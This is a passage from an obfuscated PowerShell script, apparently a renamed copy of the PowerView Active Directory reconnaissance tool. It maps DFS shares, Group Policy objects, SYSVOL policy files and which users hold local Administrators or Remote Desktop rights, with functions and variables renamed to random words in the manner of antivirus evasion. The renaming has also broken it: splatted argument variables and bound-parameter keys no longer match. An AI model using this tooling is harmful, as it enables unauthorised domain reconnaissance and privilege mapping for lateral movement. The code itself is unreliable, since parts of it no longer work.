$nmZxBYze99 = $_.Properties | |
$AxNRpCqH99 = $nmZxBYze99.'msdfs-targetlistv2'[0] | |
$xml = [xml][System.Text.Encoding]::Unicode.GetString($AxNRpCqH99[2..($AxNRpCqH99.Length-1)]) | |
$nJDLHCBB99 += $xml.targets.ChildNodes | ForEach-Object { | |
try { | |
$XVmavJoj99 = $_.InnerText | |
if ( $XVmavJoj99.Contains('\') ) { | |
$GbFGvFiQ99 = $XVmavJoj99.split('\')[3] | |
$CkweMaGz99 = $nmZxBYze99.'msdfs-linkpathv2'[0] | |
New-Object -TypeName PSObject -Property @{'Name'="$GbFGvFiQ99$CkweMaGz99";'RemoteServerName'=$XVmavJoj99.split('\')[2]} | |
} | |
} | |
catch { | |
Write-Verbose "[privileges] mortified error in parsing target : $_" | |
} | |
} | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[privileges] Error disposing of the Results object: $_" | |
} | |
} | |
$RxxDrogK99.dispose() | |
} | |
catch { | |
Write-Warning "[privileges] mortified error : $_" | |
} | |
$nJDLHCBB99 | Sort-Object -Unique -Property 'RemoteServerName' | |
} | |
} | |
} | |
PROCESS { | |
$nJDLHCBB99 = @() | |
if ($PSBoundParameters['Domain']) { | |
ForEach ($ShZaeqLs99 in $ADDDGomQ99) { | |
$ufgcNRNN99['Domain'] = $ShZaeqLs99 | |
if ($WDaNDNia99 -match 'all|1') { | |
$nJDLHCBB99 += prophecy @SearcherArguments | |
} | |
if ($WDaNDNia99 -match 'all|2') { | |
$nJDLHCBB99 += mortified @SearcherArguments | |
} | |
} | |
} | |
else { | |
if ($WDaNDNia99 -match 'all|1') { | |
$nJDLHCBB99 += prophecy @SearcherArguments | |
} | |
if ($WDaNDNia99 -match 'all|2') { | |
$nJDLHCBB99 += mortified @SearcherArguments | |
} | |
} | |
$nJDLHCBB99 | Sort-Object -Property ('RemoteServerName','Name') -Unique | |
} | |
} | |
function stupefy { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType([Hashtable])] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('gpcfilesyspath', 'Path')] | |
[String] | |
$LZmMtsJE99, | |
[Switch] | |
$UzMfZrJa99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$lkRrCLeF99 = @{} | |
} | |
PROCESS { | |
try { | |
if (($LZmMtsJE99 -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { | |
$jecirlPw99 = "\\$((New-Object System.Uri($LZmMtsJE99)).Host)\SYSVOL" | |
if (-not $lkRrCLeF99[$jecirlPw99]) { | |
Andes -Path $jecirlPw99 -KWcDeQDF99 $KWcDeQDF99 | |
$lkRrCLeF99[$jecirlPw99] = $True | |
} | |
} | |
$VunSUnBb99 = $LZmMtsJE99 | |
if (-not $VunSUnBb99.EndsWith('.inf')) { | |
$VunSUnBb99 += '\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf' | |
} | |
Write-Verbose "[stupefy] Parsing GptTmplPath: $VunSUnBb99" | |
if ($PSBoundParameters['OutputObject']) { | |
$CwZWjsZI99 = unoccupied -Path $VunSUnBb99 -UzMfZrJa99 -ErrorAction Stop | |
if ($CwZWjsZI99) { | |
$CwZWjsZI99 | Add-Member Noteproperty 'Path' $VunSUnBb99 | |
$CwZWjsZI99 | |
} | |
} | |
else { | |
$CwZWjsZI99 = unoccupied -Path $VunSUnBb99 -ErrorAction Stop | |
if ($CwZWjsZI99) { | |
$CwZWjsZI99['Path'] = $VunSUnBb99 | |
$CwZWjsZI99 | |
} | |
} | |
} | |
catch { | |
Write-Verbose "[stupefy] Error parsing $VunSUnBb99 : $_" | |
} | |
} | |
END { | |
$lkRrCLeF99.Keys | ForEach-Object { bauxite -Path $_ } | |
} | |
} | |
function leas { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.GroupsXML')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('Path')] | |
[String] | |
$XwXeqOmA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$lkRrCLeF99 = @{} | |
} | |
PROCESS { | |
try { | |
if (($XwXeqOmA99 -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { | |
$jecirlPw99 = "\\$((New-Object System.Uri($XwXeqOmA99)).Host)\SYSVOL" | |
if (-not $lkRrCLeF99[$jecirlPw99]) { | |
Andes -Path $jecirlPw99 -KWcDeQDF99 $KWcDeQDF99 | |
$lkRrCLeF99[$jecirlPw99] = $True | |
} | |
} | |
[XML]$LapgyMkW99 = Get-Content -Path $XwXeqOmA99 -ErrorAction Stop | |
$LapgyMkW99 | Select-Xml "/Groups/Group" | Select-Object -ExpandProperty node | ForEach-Object { | |
$ekAEczJN99 = $_.Properties.groupName | |
$lPPRfzla99 = $_.Properties.groupSid | |
if (-not $lPPRfzla99) { | |
if ($ekAEczJN99 -match 'Administrators') { | |
$lPPRfzla99 = 'S-1-5-32-544' | |
} | |
elseif ($ekAEczJN99 -match 'Remote Desktop') { | |
$lPPRfzla99 = 'S-1-5-32-555' | |
} | |
elseif ($ekAEczJN99 -match 'Guests') { | |
$lPPRfzla99 = 'S-1-5-32-546' | |
} | |
else { | |
if ($PSBoundParameters['Credential']) { | |
$lPPRfzla99 = epics -LqFIdcne99 $ekAEczJN99 -KWcDeQDF99 $KWcDeQDF99 | |
} | |
else { | |
$lPPRfzla99 = epics -LqFIdcne99 $ekAEczJN99 | |
} | |
} | |
} | |
$aETbShlY99 = $_.Properties.members | Select-Object -ExpandProperty Member | Where-Object { $_.action -match 'ADD' } | ForEach-Object { | |
if ($_.sid) { $_.sid } | |
else { $_.name } | |
} | |
if ($aETbShlY99) { | |
if ($_.filters) { | |
$qQKkMdVy99 = $_.filters.GetEnumerator() | ForEach-Object { | |
New-Object -TypeName PSObject -Property @{'Type' = $_.LocalName;'Value' = $_.name} | |
} | |
} | |
else { | |
$qQKkMdVy99 = $Null | |
} | |
if ($aETbShlY99 -isnot [System.Array]) { $aETbShlY99 = @($aETbShlY99) } | |
$mRclwVEx99 = New-Object PSObject | |
$mRclwVEx99 | Add-Member Noteproperty 'GPOPath' $qPuuPMlo99 | |
$mRclwVEx99 | Add-Member Noteproperty 'Filters' $qQKkMdVy99 | |
$mRclwVEx99 | Add-Member Noteproperty 'GroupName' $ekAEczJN99 | |
$mRclwVEx99 | Add-Member Noteproperty 'GroupSID' $lPPRfzla99 | |
$mRclwVEx99 | Add-Member Noteproperty 'GroupMemberOf' $Null | |
$mRclwVEx99 | Add-Member Noteproperty 'GroupMembers' $aETbShlY99 | |
$mRclwVEx99.PSObject.TypeNames.Insert(0, 'PowerView.GroupsXML') | |
$mRclwVEx99 | |
} | |
} | |
} | |
catch { | |
Write-Verbose "[leas] Error parsing $qPuuPMlo99 : $_" | |
} | |
} | |
END { | |
$lkRrCLeF99.Keys | ForEach-Object { bauxite -Path $_ } | |
} | |
} | |
function gutsy { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] | |
[OutputType('PowerView.GPO')] | |
[OutputType('PowerView.GPO.Raw')] | |
[CmdletBinding(DefaultParameterSetName = 'None')] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name')] | |
[String[]] | |
$mxWgOMSt99, | |
[Parameter(ParameterSetName = 'ComputerIdentity')] | |
[Alias('ComputerName')] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$FoYcJhqt99, | |
[Parameter(ParameterSetName = 'UserIdentity')] | |
[Alias('UserName')] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$CiKxrVpf99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] | |
[String] | |
$FaXdBAYg99, | |
[Switch] | |
$DPTKXMKA99, | |
[Alias('ReturnOne')] | |
[Switch] | |
$YIVtKGKK99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$Raw | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Properties']) { $ufgcNRNN99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['SecurityMasks']) { $ufgcNRNN99['SecurityMasks'] = $FaXdBAYg99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$QLtsdfDX99 = Richelieu @SearcherArguments | |
} | |
PROCESS { | |
if ($QLtsdfDX99) { | |
if ($PSBoundParameters['ComputerIdentity'] -or $PSBoundParameters['UserIdentity']) { | |
$SeNOlAHu99 = @() | |
if ($ufgcNRNN99['Properties']) { | |
$NTHXqpRB99 = $ufgcNRNN99['Properties'] | |
} | |
$ufgcNRNN99['Properties'] = 'distinguishedname,dnshostname' | |
$UHggnsSG99 = $Null | |
if ($PSBoundParameters['ComputerIdentity']) { | |
$ufgcNRNN99['Identity'] = $FoYcJhqt99 | |
$GrySniik99 = deputes @SearcherArguments -YIVtKGKK99 | Select-Object -First 1 | |
if(-not $GrySniik99) { | |
Write-Verbose "[gutsy] Computer '$FoYcJhqt99' not found!" | |
} | |
$dFqddswb99 = $GrySniik99.distinguishedname | |
$UHggnsSG99 = $GrySniik99.dnshostname | |
} | |
else { | |
$ufgcNRNN99['Identity'] = $CiKxrVpf99 | |
$User = horseshoed @SearcherArguments -YIVtKGKK99 | Select-Object -First 1 | |
if(-not $User) { | |
Write-Verbose "[gutsy] User '$CiKxrVpf99' not found!" | |
} | |
$dFqddswb99 = $User.distinguishedname | |
} | |
$SmJrvBto99 = @() | |
$SmJrvBto99 += $dFqddswb99.split(',') | ForEach-Object { | |
if($_.startswith('OU=')) { | |
$dFqddswb99.SubString($dFqddswb99.IndexOf("$($_),")) | |
} | |
} | |
Write-Verbose "[gutsy] object OUs: $SmJrvBto99" | |
if ($SmJrvBto99) { | |
$ufgcNRNN99.Remove('Properties') | |
$kBnExIkU99 = $False | |
ForEach($pQZWiRgW99 in $SmJrvBto99) { | |
$ufgcNRNN99['Identity'] = $pQZWiRgW99 | |
$SeNOlAHu99 += stancher @SearcherArguments | ForEach-Object { | |
if ($_.gplink) { | |
$_.gplink.split('][') | ForEach-Object { | |
if ($_.startswith('LDAP')) { | |
$Parts = $_.split(';') | |
$GpoDN = $Parts[0] | |
$EgwMqOSJ99 = $Parts[1] | |
if ($kBnExIkU99) { | |
if ($EgwMqOSJ99 -eq 2) { | |
$GpoDN | |
} | |
} | |
else { | |
$GpoDN | |
} | |
} | |
} | |
} | |
if ($_.gpoptions -eq 1) { | |
$kBnExIkU99 = $True | |
} | |
} | |
} | |
} | |
if ($UHggnsSG99) { | |
$HNDQqiGm99 = (passionless -MqGzGCsi99 $UHggnsSG99).SiteName | |
if($HNDQqiGm99 -and ($HNDQqiGm99 -notlike 'Error*')) { | |
$ufgcNRNN99['Identity'] = $HNDQqiGm99 | |
$SeNOlAHu99 += billionaire @SearcherArguments | ForEach-Object { | |
if($_.gplink) { | |
$_.gplink.split('][') | ForEach-Object { | |
if ($_.startswith('LDAP')) { | |
$_.split(';')[0] | |
} | |
} | |
} | |
} | |
} | |
} | |
$PjfjtVIL99 = $dFqddswb99.SubString($dFqddswb99.IndexOf('DC=')) | |
$ufgcNRNN99.Remove('Identity') | |
$ufgcNRNN99.Remove('Properties') | |
$ufgcNRNN99['LDAPFilter'] = "(objectclass=domain)(distinguishedname=$PjfjtVIL99)" | |
$SeNOlAHu99 += sniffling @SearcherArguments | ForEach-Object { | |
if($_.gplink) { | |
$_.gplink.split('][') | ForEach-Object { | |
if ($_.startswith('LDAP')) { | |
$_.split(';')[0] | |
} | |
} | |
} | |
} | |
Write-Verbose "[gutsy] GPOAdsPaths: $SeNOlAHu99" | |
if ($NTHXqpRB99) { $ufgcNRNN99['Properties'] = $NTHXqpRB99 } | |
else { $ufgcNRNN99.Remove('Properties') } | |
$ufgcNRNN99.Remove('Identity') | |
$SeNOlAHu99 | Where-Object {$_ -and ($_ -ne '')} | ForEach-Object { | |
$ufgcNRNN99['SearchBase'] = $_ | |
$ufgcNRNN99['LDAPFilter'] = "(objectCategory=groupPolicyContainer)" | |
sniffling @SearcherArguments | ForEach-Object { | |
if ($PSBoundParameters['Raw']) { | |
$_.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw') | |
} | |
else { | |
$_.PSObject.TypeNames.Insert(0, 'PowerView.GPO') | |
} | |
$_ | |
} | |
} | |
} | |
else { | |
$btfCLlYC99 = '' | |
$IUDzHsEr99 = '' | |
$mxWgOMSt99 | Where-Object {$_} | ForEach-Object { | |
$KzBFOtcK99 = $_.Replace('(', '\28').Replace(')', '\29') | |
if ($KzBFOtcK99 -match 'LDAP://|^CN=.*') { | |
$btfCLlYC99 += "(distinguishedname=$KzBFOtcK99)" | |
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { | |
$wXLTskQJ99 = $KzBFOtcK99.SubString($KzBFOtcK99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
Write-Verbose "[gutsy] Extracted domain '$wXLTskQJ99' from '$KzBFOtcK99'" | |
$ufgcNRNN99['Domain'] = $wXLTskQJ99 | |
$QLtsdfDX99 = Richelieu @SearcherArguments | |
if (-not $QLtsdfDX99) { | |
Write-Warning "[gutsy] Unable to retrieve domain searcher for '$wXLTskQJ99'" | |
} | |
} | |
} | |
elseif ($KzBFOtcK99 -match '{.*}') { | |
$btfCLlYC99 += "(name=$KzBFOtcK99)" | |
} | |
else { | |
try { | |
$jjIYltxr99 = (-Join (([Guid]$KzBFOtcK99).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' | |
$btfCLlYC99 += "(objectguid=$jjIYltxr99)" | |
} | |
catch { | |
$btfCLlYC99 += "(displayname=$KzBFOtcK99)" | |
} | |
} | |
} | |
if ($btfCLlYC99 -and ($btfCLlYC99.Trim() -ne '') ) { | |
$IUDzHsEr99 += "(|$btfCLlYC99)" | |
} | |
if ($PSBoundParameters['LDAPFilter']) { | |
Write-Verbose "[gutsy] Using additional LDAP filter: $hzaXgjDv99" | |
$IUDzHsEr99 += "$hzaXgjDv99" | |
} | |
$QLtsdfDX99.filter = "(&(objectCategory=groupPolicyContainer)$IUDzHsEr99)" | |
Write-Verbose "[gutsy] filter string: $($QLtsdfDX99.filter)" | |
if ($PSBoundParameters['FindOne']) { $hCEVDJUr99 = $QLtsdfDX99.FindOne() } | |
else { $hCEVDJUr99 = $QLtsdfDX99.FindAll() } | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
if ($PSBoundParameters['Raw']) { | |
$GPO = $_ | |
$GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw') | |
} | |
else { | |
if ($PSBoundParameters['SearchBase'] -and ($GNYlaBrE99 -Match '^GC://')) { | |
$GPO = epicure -nmZxBYze99 $_.Properties | |
try { | |
$GPODN = $GPO.distinguishedname | |
$JPsqdVYb99 = $GPODN.SubString($GPODN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
$PFVOQzYE99 = "\\$JPsqdVYb99\SysVol\$JPsqdVYb99\Policies\$($GPO.cn)" | |
$GPO | Add-Member Noteproperty 'gpcfilesyspath' $PFVOQzYE99 | |
} | |
catch { | |
Write-Verbose "[gutsy] Error calculating gpcfilesyspath for: $($GPO.distinguishedname)" | |
} | |
} | |
else { | |
$GPO = epicure -nmZxBYze99 $_.Properties | |
} | |
$GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO') | |
} | |
$GPO | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[gutsy] Error disposing of the Results object: $_" | |
} | |
} | |
$QLtsdfDX99.dispose() | |
} | |
} | |
} | |
} | |
function symbolization { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.GPOGroup')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name')] | |
[String[]] | |
$mxWgOMSt99, | |
[Switch] | |
$dvmwaZmM99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['LDAPFilter']) { $ufgcNRNN99['LDAPFilter'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$pQxPRCuR99 = @{} | |
if ($PSBoundParameters['Domain']) { $pQxPRCuR99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Server']) { $pQxPRCuR99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['Credential']) { $pQxPRCuR99['Credential'] = $KWcDeQDF99 } | |
$ttzaAAEl99 = [System.StringSplitOptions]::RemoveEmptyEntries | |
} | |
PROCESS { | |
if ($PSBoundParameters['Identity']) { $ufgcNRNN99['Identity'] = $mxWgOMSt99 } | |
gutsy @SearcherArguments | ForEach-Object { | |
$jIfgeahE99 = $_.displayname | |
$rVwWCmiO99 = $_.name | |
$TqcfsIBD99 = $_.gpcfilesyspath | |
$ojSfAipd99 = @{ 'GptTmplPath' = "$TqcfsIBD99\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" } | |
if ($PSBoundParameters['Credential']) { $ojSfAipd99['Credential'] = $KWcDeQDF99 } | |
$Inf = stupefy @ParseArgs | |
if ($Inf -and ($Inf.psbase.Keys -contains 'Group Membership')) { | |
$nHfLgnhW99 = @{} | |
ForEach ($WpSHaCQh99 in $Inf.'Group Membership'.GetEnumerator()) { | |
$Group, $VBALdeeP99 = $WpSHaCQh99.Key.Split('__', $ttzaAAEl99) | ForEach-Object {$_.Trim()} | |
$MPBEhXdE99 = $WpSHaCQh99.Value | Where-Object {$_} | ForEach-Object { $_.Trim('*') } | Where-Object {$_} | |
if ($PSBoundParameters['ResolveMembersToSIDs']) { | |
$ZDEGdyuZ99 = @() | |
ForEach ($gPVoRuJA99 in $MPBEhXdE99) { | |
if ($gPVoRuJA99 -and ($gPVoRuJA99.Trim() -ne '')) { | |
if ($gPVoRuJA99 -notmatch '^S-1-.*') { | |
$KTStuQIh99 = @{'ObjectName' = $gPVoRuJA99} | |
if ($PSBoundParameters['Domain']) { $KTStuQIh99['Domain'] = $ADDDGomQ99 } | |
$DOQnuyZw99 = epics @ConvertToArguments | |
if ($DOQnuyZw99) { | |
$ZDEGdyuZ99 += $DOQnuyZw99 | |
} | |
else { | |
$ZDEGdyuZ99 += $gPVoRuJA99 | |
} | |
} | |
else { | |
$ZDEGdyuZ99 += $gPVoRuJA99 | |
} | |
} | |
} | |
$MPBEhXdE99 = $ZDEGdyuZ99 | |
} | |
if (-not $nHfLgnhW99[$Group]) { | |
$nHfLgnhW99[$Group] = @{} | |
} | |
if ($MPBEhXdE99 -isnot [System.Array]) {$MPBEhXdE99 = @($MPBEhXdE99)} | |
$nHfLgnhW99[$Group].Add($VBALdeeP99, $MPBEhXdE99) | |
} | |
ForEach ($WpSHaCQh99 in $nHfLgnhW99.GetEnumerator()) { | |
if ($WpSHaCQh99 -and $WpSHaCQh99.Key -and ($WpSHaCQh99.Key -match '^\*')) { | |
$lPPRfzla99 = $WpSHaCQh99.Key.Trim('*') | |
if ($lPPRfzla99 -and ($lPPRfzla99.Trim() -ne '')) { | |
$ekAEczJN99 = Malory -ObjectSID $lPPRfzla99 @ConvertArguments | |
} | |
else { | |
$ekAEczJN99 = $False | |
} | |
} | |
else { | |
$ekAEczJN99 = $WpSHaCQh99.Key | |
if ($ekAEczJN99 -and ($ekAEczJN99.Trim() -ne '')) { | |
if ($ekAEczJN99 -match 'Administrators') { | |
$lPPRfzla99 = 'S-1-5-32-544' | |
} | |
elseif ($ekAEczJN99 -match 'Remote Desktop') { | |
$lPPRfzla99 = 'S-1-5-32-555' | |
} | |
elseif ($ekAEczJN99 -match 'Guests') { | |
$lPPRfzla99 = 'S-1-5-32-546' | |
} | |
elseif ($ekAEczJN99.Trim() -ne '') { | |
$KTStuQIh99 = @{'ObjectName' = $ekAEczJN99} | |
if ($PSBoundParameters['Domain']) { $KTStuQIh99['Domain'] = $ADDDGomQ99 } | |
$lPPRfzla99 = epics @ConvertToArguments | |
} | |
else { | |
$lPPRfzla99 = $Null | |
} | |
} | |
} | |
$OlYeNaWL99 = New-Object PSObject | |
$OlYeNaWL99 | Add-Member Noteproperty 'GPODisplayName' $jIfgeahE99 | |
$OlYeNaWL99 | Add-Member Noteproperty 'GPOName' $rVwWCmiO99 | |
$OlYeNaWL99 | Add-Member Noteproperty 'GPOPath' $TqcfsIBD99 | |
$OlYeNaWL99 | Add-Member Noteproperty 'GPOType' 'RestrictedGroups' | |
$OlYeNaWL99 | Add-Member Noteproperty 'Filters' $Null | |
$OlYeNaWL99 | Add-Member Noteproperty 'GroupName' $ekAEczJN99 | |
$OlYeNaWL99 | Add-Member Noteproperty 'GroupSID' $lPPRfzla99 | |
$OlYeNaWL99 | Add-Member Noteproperty 'GroupMemberOf' $WpSHaCQh99.Value.Memberof | |
$OlYeNaWL99 | Add-Member Noteproperty 'GroupMembers' $WpSHaCQh99.Value.Members | |
$OlYeNaWL99.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup') | |
$OlYeNaWL99 | |
} | |
} | |
$ojSfAipd99 = @{ | |
'GroupsXMLpath' = "$TqcfsIBD99\MACHINE\Preferences\Groups\Groups.xml" | |
} | |
leas @ParseArgs | ForEach-Object { | |
if ($PSBoundParameters['ResolveMembersToSIDs']) { | |
$ZDEGdyuZ99 = @() | |
ForEach ($gPVoRuJA99 in $_.GroupMembers) { | |
if ($gPVoRuJA99 -and ($gPVoRuJA99.Trim() -ne '')) { | |
if ($gPVoRuJA99 -notmatch '^S-1-.*') { | |
$KTStuQIh99 = @{'ObjectName' = $ekAEczJN99} | |
if ($PSBoundParameters['Domain']) { $KTStuQIh99['Domain'] = $ADDDGomQ99 } | |
$DOQnuyZw99 = epics -ADDDGomQ99 $ADDDGomQ99 -LqFIdcne99 $gPVoRuJA99 | |
if ($DOQnuyZw99) { | |
$ZDEGdyuZ99 += $DOQnuyZw99 | |
} | |
else { | |
$ZDEGdyuZ99 += $gPVoRuJA99 | |
} | |
} | |
else { | |
$ZDEGdyuZ99 += $gPVoRuJA99 | |
} | |
} | |
} | |
$_.GroupMembers = $ZDEGdyuZ99 | |
} | |
$_ | Add-Member Noteproperty 'GPODisplayName' $jIfgeahE99 | |
$_ | Add-Member Noteproperty 'GPOName' $rVwWCmiO99 | |
$_ | Add-Member Noteproperty 'GPOType' 'GroupPolicyPreferences' | |
$_.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup') | |
$_ | |
} | |
} | |
} | |
} | |
function Deuteronomy { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.GPOUserLocalGroupMapping')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name')] | |
[String] | |
$mxWgOMSt99, | |
[String] | |
[ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')] | |
$ifkgdQea99 = 'Administrators', | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$pdpolLiZ99 = @{} | |
if ($PSBoundParameters['Domain']) { $pdpolLiZ99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Server']) { $pdpolLiZ99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $pdpolLiZ99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $pdpolLiZ99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $pdpolLiZ99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $pdpolLiZ99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $pdpolLiZ99['Credential'] = $KWcDeQDF99 } | |
} | |
PROCESS { | |
$htZjqJmH99 = @() | |
if ($PSBoundParameters['Identity']) { | |
$htZjqJmH99 += sniffling @CommonArguments -mxWgOMSt99 $mxWgOMSt99 | Select-Object -Expand objectsid | |
$gsUmfyKw99 = $htZjqJmH99 | |
if (-not $htZjqJmH99) { | |
Throw "[Deuteronomy] Unable to retrieve SID for identity '$mxWgOMSt99'" | |
} | |
} | |
else { | |
$htZjqJmH99 = @('*') | |
} | |
if ($ifkgdQea99 -match 'S-1-5') { | |
$MSROXiWs99 = $ifkgdQea99 | |
} | |
elseif ($ifkgdQea99 -match 'Admin') { | |
$MSROXiWs99 = 'S-1-5-32-544' | |
} | |
else { | |
$MSROXiWs99 = 'S-1-5-32-555' | |
} | |
if ($htZjqJmH99[0] -ne '*') { | |
ForEach ($CHKYAbAI99 in $htZjqJmH99) { | |
